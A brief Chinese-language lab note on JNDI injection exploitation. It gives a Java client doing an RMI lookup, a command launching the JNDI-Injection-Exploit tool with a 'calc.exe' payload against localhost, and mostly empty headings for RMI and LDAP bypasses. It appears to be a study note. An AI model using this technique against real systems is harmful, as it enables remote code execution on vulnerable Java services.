Client:
import javax.naming.Context;import javax.naming.InitialContext;public class JDNIClient {public static void main(String[] args) throws Exception {Context cxt = new InitialContext();cxt.lookup("rmi://127.0.0.1:1099/nanvqg");}}
01. 低版本 RMI 利用
启动JNDIExploit:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc.exe” -A “127.0.0.1”
然后Client lookup请求恶意的地址即可
02. 低版本 LDAP 利用
03. 高版本 RMI利用
参考 高版本绕过分析.

04. 高版本 LDAP利用
https://github.com/Firebasky/LdapBypassJndi/blob/main/README.zh-cn.md
参考高版本绕过分析.
